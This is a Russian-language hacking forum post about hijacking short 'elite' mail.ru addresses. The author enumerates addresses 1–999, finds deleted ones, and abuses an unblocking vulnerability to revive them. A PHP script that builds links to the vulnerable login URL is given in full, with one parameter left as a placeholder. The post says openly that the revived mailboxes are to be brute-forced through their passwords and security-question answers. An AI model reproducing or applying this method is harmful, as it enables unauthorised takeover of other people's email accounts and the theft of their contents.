Продлеваем жизнь элитному email!Думаю вам известно, что 1\2\3 символьную почту с недавних пор на сервисе mail.ru нельзя регистрировать! Это очень обидно...НО почту всегда можно взломать, и вот сегодня мы поговорим о том как было востановленно большое количество почтовых ящиков(которые были удалены или заблокированы) 1)Все началось с уязвимости дающая разблокировать ЛЮБУЮ почту(даже если она заблокирована скриптом, спамом и т.д.) 2)Я сгенерировал почтовые ящики начиная от 1 и заканчивая 999(со всеми 4 доменами). 3)После был написан софт(спасибо Zdez Bil Ya ), который проверяет почтовые ящики на удаленные 4)Получился список прочеканых email'ов, а т.к. очень много времени ушлобы на каждое мыло вставлять потом переходить по ссылке и разблокировать, то был написан скрипт на php (спасибо .fry) PHP: <?php echo "<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"ufile\" /><input type=\"submit\" value=\"Upload\" /></form>"; if (!isset($_FILES['ufile'])) { exit; } echo "<h3>File Info</h3>"; print_r($_FILES); echo "<h3>Parsing</h3>"; $aFile = file($_FILES['ufile']['tmp_name']); $iCount = count($aFile); for ($i = 0; $i < $iCount; $i++) { echo "<a href=\"http://e.mail.ru/cgi-bin/login?email=" . $aFile[$i] . "заменяемая переменная">" . $aFile[$i] . "</a><br />"; } ?> С помощью скрипта мы получаем страничку с гиперссылками на уязвимость. И начинаем переходить по ссылкам и разблокировать почтовые ящики.... Если вы спросите:"А нафига их разблокировать?!" Объясняю, через год (где-то) email удаляется, а так я даю им жить еще почти целый год и за этот период их можно брутить перебором паролей, так и перебором ответов на вопрос. Ниже представлен список email'ов, которые были разблокированы. PHP: Т.к. тут нет хайда список выложен в исходной статье Как вы понимаете, были разблокированы и такие ящики как qwerty,666 и т.д, но это уже другая история...... С уважением SHYLLER. источник Продлеваем жизнь элитному email